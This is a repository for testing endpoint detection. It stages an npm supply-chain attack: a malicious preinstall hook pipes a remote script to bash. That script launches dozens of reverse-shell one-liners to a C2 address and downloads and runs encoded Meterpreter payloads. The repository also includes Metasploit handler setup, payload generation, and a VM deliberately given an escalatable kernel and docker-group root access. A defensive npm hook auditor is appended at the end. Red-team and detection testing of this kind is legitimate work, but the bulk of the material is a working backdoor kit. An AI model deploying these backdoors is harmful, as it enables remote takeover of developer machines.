Repository layout:

```
.
├── README.md
├── config
├── local
│   ├── install_backdoored_npm.sh
│   ├── package.json
│   ├── package
│   │   └── package.json
│   ├── package_npm_archive.sh
│   └── vulnerable_machine
│       ├── Vagrantfile
│       └── provision.sh
├── remote
│   ├── all_the_backdoors.sh
│   ├── all_the_handlers.rc
│   └── handle_handlers.sh
├── setup_and_run_local.sh
└── setup_and_run_remote.sh
```

---

/README.md:

# Simple EDR test initial access scenario

I don't want to publish detection results as I'm not convinced it is not helping the bad guys more, and in any case if you bought a shiny and expensive product you should take it for a spin. With all this around it should be fairly easy.

It is a reduced and also somewhat extended version of a test case we were using. Let me know or open a PR if something does not work.

## Scenario

- You are installing an npm package that has a dependency that got backdoored
- In a malicious `preinstall` script it downloads and runs a script
- That drops a bunch of backdoors
- The adversary is an obvious old-school reverse shell plus open-source tools like [Metasploit](https://github.com/rapid7/metasploit-framework) (and I recommend adding [Mythic](https://github.com/its-a-feature/Mythic), but I was too lazy to automate that)

## Why?

Realistic test cases for testing security tools are hard to come by:

- You don't want to waste time creating a complicated, realistic scenario, but if a simple one gets detected it is unclear whether that is because what you did was obvious or whether it would also be detected in less obvious situations (legitimate parent process, staged loading, etc.)
- If things don't get detected you will get push-back from providers: "Hey, this is just your lab stuff, in reality we would have detected it"
- It includes a bunch of different versions of reverse shells so you can check how robust the detection is

## Does NOT include anything new

Does not:

- include exploits / use any vulnerability
- have novel bypasses
- include anything post-exploitation

## Troubleshooting

- Metasploit handlers will die every once in a while so only use

## Setup

- You will need one or more test machines where you will be dropping the backdoors (local) and a C2 host that they can reach (remote)
- local: you will need `curl`, `sed`, `bash` and of course `npm`. For some backdoors to work you will need `python` and `php`. Some of the ghetto reverse shells will fail because of shell syntax/capability/package differences, but that should not break script execution. But really, just use the vulnerable box for Linux.
- remote: you will need Metasploit (and `ruby` if it does not come with it)

Super simple, but the internet will know your C2 IP:

1. fork the repo and set the C2 IP in the config file
2. clone your fork on the C2 and run `setup_and_run_remote.sh`
3. clone your fork on all your test machines and run `setup_and_run_local.sh`

Alternatively you can just clone this one and remember to set all configs without making typos.

## Vulnerable box

There is also a vulnerable Linux VM you can use for testing. Comes with:

- `npm` installed to run the backdoored package installation
- a kernel version that has a few privilege escalations with Metasploit modules
- Docker, so you can escalate privileges like you would on any developer machine
- it is in Vagrant to help you snapshot/reset to the states you might need in testing

## Frequently Answered Answers

- This is just a lab scenario: [Nope](https://www.zdnet.com/article/malicious-npm-package-opens-backdoors-on-programmers-computers/)
- Nobody uses these tools in reality, we do detect malware/miners etc. better: [Yeah, naaah..](https://www.redscan.com/news/key-insights-from-the-conti-ransomware-playbook-leak-foothold/)
- A reverse shell by itself is not malicious: I recommend you try all the post scripts in Metasploit but don't start with the exploits. You can also manually do some obvious `authorized_keys` or cron persistence.

## Things you could do to go deeper

- adding [Mythic](https://github.com/its-a-feature/Mythic) is really worth it and you can work with a proper modern C2 framework
- for macOS there is some pretty cool [JXA stuff](https://github.com/D00MFist/PersistentJXA) out there that works
- in some cases EDRs do detect command patterns, so you may want other options than `wget -> sh` and `wget -> chmod -> run`
- payloads are served from the same IP, but I tried to make it easy for you to change that (does not make a difference though)

---

/config:

```sh
HANDLER_IP=whynot
WEBSERVER_PORT=8000
WEBSERVER_IP=$HANDLER_IP
```

---

/local/install_backdoored_npm.sh:

```bash
#!/bin/bash
npm install
# clean up so you can run them again
rm -rf ./node_modules ./package-lock.json
```

---

/local/package.json:

```json
{
  "name": "haxored",
  "dependencies": {
    "backdoors": "file:backdoors.tgz"
  }
}
```

---

/local/package/package.json:

```json
{
  "name": "backdoors",
  "scripts": {
    "preinstall": "curl -s http://WEBSERVER_IP:WEBSERVER_PORT/all_the_backdoors.sh | bash"
  }
}
```

---

/local/package_npm_archive.sh:

```bash
#!/bin/bash
# npm expects the tarball's top-level directory to be named "package"
tar -czvf backdoors.tgz package
```

---

/local/vulnerable_machine/Vagrantfile:

```ruby
# -*- mode: ruby -*-
# vi: set ft=ruby :

# All Vagrant configuration is done below. The "2" in Vagrant.configure
# configures the configuration version (we support older styles for
# backwards compatibility). Please don't change it unless you know what
# you're doing.
Vagrant.configure("2") do |config|
  # The most common configuration options are documented and commented below.
  # For a complete reference, please see the online documentation at
  # https://docs.vagrantup.com.

  # Every Vagrant development environment requires a box. You can search for
  # boxes at https://vagrantcloud.com/search.
  config.vm.box = "bento/ubuntu-20.04"
  config.vm.box_version = "202105.25.0"
  # Disable automatic box update checking. If you disable this, then
  # boxes will only be checked for updates when the user runs
  # `vagrant box outdated`. This is not recommended.
  # config.vm.box_check_update = false

  # Create a forwarded port mapping which allows access to a specific port
  # within the machine from a port on the host machine. In the example below,
  # accessing "localhost:8080" will access port 80 on the guest machine.
  # NOTE: This will enable public access to the opened port
  # config.vm.network "forwarded_port", guest: 80, host: 8080

  # Create a forwarded port mapping which allows access to a specific port
  # within the machine from a port on the host machine and only allow access
  # via 127.0.0.1 to disable public access
  # config.vm.network "forwarded_port", guest: 80, host: 8080, host_ip: "127.0.0.1"

  # Create a private network, which allows host-only access to the machine
  # using a specific IP.
  # config.vm.network "private_network", ip: "192.168.33.10"

  # Create a public network, which generally matched to bridged network.
  # Bridged networks make the machine appear as another physical device on
  # your network.
  # config.vm.network "public_network"

  # Share an additional folder to the guest VM. The first argument is
  # the path on the host to the actual folder. The second argument is
  # the path on the guest to mount the folder. And the optional third
  # argument is a set of non-required options.
  config.vm.synced_folder "../../", "/vagrant_data"

  # Provider-specific configuration so you can fine-tune various
  # backing providers for Vagrant. These expose provider-specific options.
  # Example for VirtualBox:
  #
  # config.vm.provider "virtualbox" do |vb|
  #   # Display the VirtualBox GUI when booting the machine
  #   vb.gui = true
  #
  #   # Customize the amount of memory on the VM:
  #   vb.memory = "1024"
  # end
  #
  # View the documentation for the provider you are using for more
  # information on available options.

  # Enable provisioning with a shell script. Additional provisioners such as
  # Ansible, Chef, Docker, Puppet and Salt are also available. Please see the
  # documentation for more information about their specific syntax and use.
  # config.vm.provision "shell", inline: <<-SHELL
  config.vm.provision "shell", path: "provision.sh"
  #   apt-get update
  #   apt-get install -y apache2
  # SHELL
  # Reboot so the provisioned (older) kernel is the one that boots
  config.trigger.after [:provision] do |t|
    t.name = "Reboot after provisioning"
    t.run = { :inline => "vagrant reload" }
  end
end
```

---

/local/vulnerable_machine/provision.sh:

```bash
#!/bin/bash
# Docker
apt-get update && apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu focal stable" && apt-get update
# focal has no "python" package; python-is-python2 provides the "python" binary the shells call
apt-get install -y docker-ce npm git python2 python-is-python2 php
# Right kernel version for privilege escalation
apt-get install -y linux-image-5.8.0-48-generic
apt-get -y purge linux-image-5.4.0-73-generic

# Adding the docker group to make it possible to escalate to root
groupadd docker
usermod -aG docker vagrant
newgrp docker
```

---

/remote/all_the_backdoors.sh:

```bash
#loaded with "preinstall": "wget -q -O - http://WEBSERVER_IP:WEBSERVER_PORT/all_the_backdoors.sh | bash"
unameOut="$(uname -s)"
case "${unameOut}" in
    Linux*)     machine=Linux;;
    Darwin*)    machine=Mac;;
    *)          machine="UNKNOWN:${unameOut}"
esac

# Getto shells
# Going to port 4242
# use exploit/multi/handler
# set payload linux/x86/shell/reverse_tcp
# set lport 4242
# set lhost 0.0.0.0
# run -j -z --> but it is better to run it 1-by-1
bash -i >& /dev/tcp/HANDLER_IP/4242 0>&1
ncat -e /bin/sh HANDLER_IP 4242
nc -c bash HANDLER_IP 4242
netcat HANDLER_IP 4242 -e /bin/bash
#netcat --udp HANDLER_IP 4242 -e /bin/bash &
#bash -i >& /dev/udp/HANDLER_IP/4242 &
export RHOST="HANDLER_IP";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
#awk 'BEGIN {s = "/inet/tcp/0/HANDLER_IP/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null &
python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("HANDLER_IP",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("HANDLER_IP",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
python -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("HANDLER_IP",4242));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'
python -c 'a=__import__;b=a("socket");c=a("subprocess").call;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("HANDLER_IP",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'
python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("HANDLER_IP",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("HANDLER_IP",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
python -c 'a=__import__;b=a("socket").socket;c=a("subprocess").call;s=b();s.connect(("HANDLER_IP",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
php -r '$sock=fsockopen("HANDLER_IP",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("HANDLER_IP",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("HANDLER_IP",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("HANDLER_IP",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("HANDLER_IP",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("HANDLER_IP",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'


# ubuntu
if [ "$machine" == "Linux" ]; then
    # unstaged going to port 4343
    # webserver at WEBSERVER_IP:WEBSERVER_PORT
    # use exploit/multi/handler
    # set payload linux/x64/meterpreter_reverse_tcp
    # set lport 4343
    # set lhost 0.0.0.0
    # run -j -z
    # msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -e x86/shikata_ga_nai -i 19 -f elf > m_shi_iter.elf
    # msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -e x86/shikata_ga_nai -f elf > m_shi.elf
    # msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -f elf > m.elf
    wget http://WEBSERVER_IP:WEBSERVER_PORT/linux/m_shi_iter.elf -O m_shi_iter.elf && chmod +x ./m_shi_iter.elf && ./m_shi_iter.elf & rm ./m_shi_iter.elf
    wget http://WEBSERVER_IP:WEBSERVER_PORT/linux/m_shi.elf -O m_shi.elf && chmod +x ./m_shi.elf && ./m_shi.elf & rm ./m_shi.elf
    wget http://WEBSERVER_IP:WEBSERVER_PORT/linux/m.elf -O m.elf && chmod +x ./m.elf && ./m.elf & rm ./m.elf
    # This one is for reflective loading on linux with https://github.com/rek7/fireELF but I'm not automating this for now so you hafta create the payload and uncomment the line
    # python -c "import urllib2;exec(urllib2.urlopen('http://WEBSERVER_IP:WEBSERVER_PORT/linux/metr_loaded.py').read())" &

    # staged going to port 4444
    # webserver at WEBSERVER_IP:WEBSERVER_PORT
    # use exploit/multi/handler
    # set payload linux/x64/meterpreter/reverse_tcp
    # set lport 4444
    # set lhost 0.0.0.0
    # run -j -z
    # msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -e x86/shikata_ga_nai -i 19 -f elf > m_staged_shi_iter.elf
    # msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -e x86/shikata_ga_nai -f elf > m_staged_shi.elf
    # msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -f elf > m_staged.elf
    wget http://HANDLER_IP:WEBSERVER_PORT/linux/m_staged_shi_iter.elf -O m_staged_shi_iter.elf && chmod +x ./m_staged_shi_iter.elf && ./m_staged_shi_iter.elf & rm ./m_staged_shi_iter.elf
    wget http://HANDLER_IP:WEBSERVER_PORT/linux/m_staged_shi.elf -O m_staged_shi.elf && chmod +x ./m_staged_shi.elf && ./m_staged_shi.elf & rm ./m_staged_shi.elf
    wget http://HANDLER_IP:WEBSERVER_PORT/linux/m_staged.elf -O m_staged.elf && chmod +x ./m_staged.elf && ./m_staged.elf & rm ./m_staged.elf

    # This one is for reflective loading on linux with https://github.com/rek7/fireELF but I'm not automating this for now so you hafta create the payload and uncomment the line
    # python -c "import urllib2;exec(urllib2.urlopen('http://HANDLER_IP:WEBSERVER_PORT/linux/metr_staged_loaded.py').read())" &

    # Mythic
    # it is a bit more complicated but worth playing around, you have to generate the implants yourself https://github.com/its-a-feature/Mythic
    #wget http://WEBSERVER_IP:WEBSERVER_PORT/linux/merlin.elf -O merlin.elf && chmod +x ./merlin.elf && ./merlin.elf & rm ./merlin.elf
    #wget http://WEBSERVER_IP:WEBSERVER_PORT/linux/merlin_obfuscated.elf -O merlin_obfuscated.elf && chmod +x ./merlin_obfuscated.elf && ./merlin_obfuscated.elf & rm ./merlin_obfuscated.elf
    #python2 -c "import urllib2;exec(urllib2.urlopen('http://WEBSERVER_IP:WEBSERVER_PORT/linux/medusa_linux.py').read())" &
    #python2 -c "import urllib2;exec(urllib2.urlopen('http://WEBSERVER_IP:WEBSERVER_PORT/linux/medusa_linux_obfuscated.py').read())" &
fi

# osx
if [ "$machine" == "Mac" ]; then
    # meterpreter
    # use exploit/multi/handler
    # set payload python/meterpreter/reverse_tcp
    # set lport 4545
    # set lhost 0.0.0.0
    # run -j -z
    curl -s http://WEBSERVER_IP:WEBSERVER_PORT/macos/py_meter.py | python2

    # Mythic
    # it is a bit more complicated but worth playing around, you have to generate the implants yourself https://github.com/its-a-feature/Mythic
    # apfell
    #curl http://WEBSERVER_IP:WEBSERVER_PORT/macos/apfell_final.js | osascript -l JavaScript &
    # Medusa
    #python2 -c "import urllib2;exec(urllib2.urlopen('http://WEBSERVER_IP:WEBSERVER_PORT/linux/medusa_linux.py').read())" &
    #python2 -c "import urllib2;exec(urllib2.urlopen('http://WEBSERVER_IP:WEBSERVER_PORT/linux/medusa_linux_obfuscated.py').read())" &
fi
```

---

/remote/all_the_handlers.rc:

```
# Getto shells going to port 4242
use exploit/multi/handler
set payload linux/x86/shell/reverse_tcp
set lport 4242
set lhost 0.0.0.0
run -j -z
# but it is better to run it 1-by-1 if you actually want to test

# unstaged going to port 4343
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set lport 4343
set lhost 0.0.0.0
run -j -z

# staged going to port 4444
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lport 4444
set lhost 0.0.0.0
run -j -z

# python on osx to 4545
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lport 4545
set lhost 0.0.0.0
run -j -z
```

---

/remote/handle_handlers.sh:

```bash
#!/bin/bash
echo "creating the payloads"
mkdir linux macos
cd linux
# file names must match what all_the_backdoors.sh fetches from /linux/
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -e x86/shikata_ga_nai -i 19 -f elf > m_staged_shi_iter.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -e x86/shikata_ga_nai -f elf > m_staged_shi.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -f elf > m_staged.elf

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -e x86/shikata_ga_nai -i 19 -f elf > m_shi_iter.elf
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -e x86/shikata_ga_nai -f elf > m_shi.elf
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -f elf > m.elf

cd ../macos
msfvenom -p python/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4545 > py_meter.py
# back to remote/ so the web server's document root contains all_the_backdoors.sh,
# linux/ and macos/, and so msfconsole finds the .rc file
cd ..

echo "starting web server"
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => WEBSERVER_PORT, :DocumentRoot => Dir.pwd).start' &

echo "starting MSF"
msfconsole -r ./all_the_handlers.rc
```

---

/setup_and_run_local.sh:

```bash
#!/bin/bash
CONFIG_FILE=./config
if [ ! -f "$CONFIG_FILE" ]; then
    echo "Config file does not exist."
    exit 1
fi
source "$CONFIG_FILE"
if [ "$HANDLER_IP" == "whynot" ]; then
    echo "you forgot to set the C2 IP, please fix that in config"
    exit 1
fi
echo "$WEBSERVER_IP"
echo "$WEBSERVER_PORT"
curl --max-time 2 "http://$WEBSERVER_IP:$WEBSERVER_PORT" || { echo "The web server is not started or not accessible, please figure that out first"; exit 1; }

cd local

echo "hardcoding web server port and ip"
sed -i "s/WEBSERVER_IP/$WEBSERVER_IP/" ./package/package.json
sed -i "s/WEBSERVER_PORT/$WEBSERVER_PORT/" ./package/package.json

echo "packaging malicious dependency"
./package_npm_archive.sh

echo "running npm install to trigger the backdoors"
./install_backdoored_npm.sh
```

---

/setup_and_run_remote.sh:

```bash
#!/bin/bash
CONFIG_FILE=./config
if [ ! -f "$CONFIG_FILE" ]; then
    echo "Config file does not exist."
    exit 1
fi
source "$CONFIG_FILE"
if [ "$HANDLER_IP" == "whynot" ]; then
    echo "you forgot to set the C2 IP, please fix that in config"
    exit 1
fi
cd remote
echo "hardcoding web server port and ip and handler ip"
sed -i "s/WEBSERVER_IP/$WEBSERVER_IP/" ./handle_handlers.sh
sed -i "s/HANDLER_IP/$HANDLER_IP/" ./handle_handlers.sh
sed -i "s/WEBSERVER_PORT/$WEBSERVER_PORT/" ./handle_handlers.sh
sed -i "s/WEBSERVER_IP/$WEBSERVER_IP/" ./all_the_backdoors.sh
sed -i "s/HANDLER_IP/$HANDLER_IP/" ./all_the_backdoors.sh
sed -i "s/WEBSERVER_PORT/$WEBSERVER_PORT/" ./all_the_backdoors.sh
echo "starting handlers"
./handle_handlers.sh
```
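A defender-side counterpart to the scenario above, added here as an example and not part of the repository: it parses npm lifecycle hooks (`preinstall` and friends) and flags the fetch-and-pipe-to-shell pattern the backdoored `package/package.json` uses. The pattern list, the `audit_tree` walk over `node_modules` and the two inline manifests are my own constructions, not something the repository defines.

```python
"""Audit npm lifecycle scripts for download-and-execute behaviour.

The backdoored dependency in this scenario runs
"curl -s http://.../all_the_backdoors.sh | bash" from its preinstall hook.
This scans package.json manifests and reports hooks that fetch remote
content and feed it to a shell or interpreter. (Added example, not repo code.)
"""
import json
import re
from pathlib import Path

# Lifecycle hooks that npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns worth flagging in an install hook: (label, regex). Constructed list.
SUSPICIOUS = [
    ("fetch piped to shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")),
    ("fetch piped to interpreter",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(python\d?|php|node|perl|osascript)\b")),
    ("bash tcp/udp redirect", re.compile(r"/dev/(tcp|udp)/")),
    ("inline interpreter one-liner", re.compile(r"\b(python\d?|php|perl|ruby)\s+-[cre]\b")),
    ("download then execute", re.compile(r"\b(curl|wget)\b.*&&.*chmod\s+\+x")),
]


def audit_script(hook: str, command: str) -> list[dict]:
    """Return one finding per matched pattern for a single lifecycle hook."""
    return [{"hook": hook, "pattern": label, "command": command}
            for label, rx in SUSPICIOUS if rx.search(command)]


def audit_package_json(text: str, origin: str = "<inline>") -> list[dict]:
    """Audit the install-time hooks declared in one package.json document."""
    try:
        manifest = json.loads(text)
    except json.JSONDecodeError:
        # A manifest npm cannot parse is itself worth a look.
        return [{"hook": "-", "pattern": "unparseable package.json",
                 "command": "", "package": origin}]
    if not isinstance(manifest, dict):
        manifest = {}
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if isinstance(cmd, str):
            for finding in audit_script(hook, cmd):
                finding["package"] = manifest.get("name", origin)
                findings.append(finding)
    return findings


def audit_tree(root: Path) -> list[dict]:
    """Audit the root package.json and every package.json under node_modules."""
    findings = []
    for pj in [root / "package.json", *root.glob("node_modules/**/package.json")]:
        if pj.is_file():
            findings.extend(audit_package_json(pj.read_text(), str(pj)))
    return findings


# Constructed manifest mirroring the scenario's /local/package/package.json.
BACKDOORED_MANIFEST = json.dumps({"name": "backdoors", "scripts": {
    "preinstall": "curl -s http://WEBSERVER_IP:WEBSERVER_PORT/all_the_backdoors.sh | bash"}})
# Constructed benign manifest: a postinstall that only runs a local build step.
BENIGN_MANIFEST = json.dumps({"name": "widget", "scripts": {"postinstall": "node scripts/build.js"}})

if __name__ == "__main__":
    for f in audit_package_json(BACKDOORED_MANIFEST):
        print(f"[{f['package']}] {f['hook']}: {f['pattern']} -> {f['command']}")
    # Mitigation for this scenario: `npm install --ignore-scripts` (or
    # `npm config set ignore-scripts true`) stops lifecycle hooks from running at all.
```

Run `audit_tree(Path("."))` in a project directory after `npm install --ignore-scripts` to review every dependency's hooks before allowing them to execute.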